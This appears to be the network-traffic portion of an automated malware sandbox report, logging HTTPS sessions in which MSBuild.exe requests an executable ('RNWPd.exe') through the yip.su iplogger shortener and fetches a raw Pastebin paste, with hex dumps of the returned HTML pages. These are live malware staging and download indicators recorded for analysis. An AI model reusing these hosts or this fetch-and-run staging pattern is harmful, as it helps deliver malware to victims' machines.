2024-09-16 19:23:52 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:23:52 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:23:52 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:23:52 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:23:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.6	49796	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:53 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:23:53 UTC	902	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:23:53 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:23:53 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7QWIvRgfgmASZfJpsVe2ttPNi7KQqdezvYeESu52ydbNlp9olx8spWRlX%2FWS2ZiScO7N%2FGSRcA4%2Fgr2cj5GnoeJsy8HSXLBl8nbgOkechdmw%2FrvVo509ejc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433bc94aaa72c2-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:23:53 UTC	467	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:23:53 UTC	1369	IN	Data Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
2024-09-16 19:23:53 UTC	1369	IN	Data Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
2024-09-16 19:23:53 UTC	1369	IN	Data Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
2024-09-16 19:23:53 UTC	1369	IN	Data Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
2024-09-16 19:23:53 UTC	1369	IN	Data Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
2024-09-16 19:23:53 UTC	158	IN	Data Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:23:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.6	49797	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:58 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:23:58 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433be95cbdc436-EWR
2024-09-16 19:23:58 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:23:58 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:23:58 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:23:58 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:23:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.6	49798	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:59 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:23:59 UTC	900	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:23:59 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:23:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTqrw2FhivWqey0geRkCaNXHC8MK%2FUAJvUs3vFTdLpVnikULcnrQPRJNvu9UDTvH2nX2hY8CW6G6CJCROForznmGmLaAeUZ1p8ufdBHxZp%2FDn04iTe%2F8Mag%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433beece3d1962-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:23:59 UTC	469	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:23:59 UTC	1369	IN	Data Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
2024-09-16 19:23:59 UTC	1369	IN	Data Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear 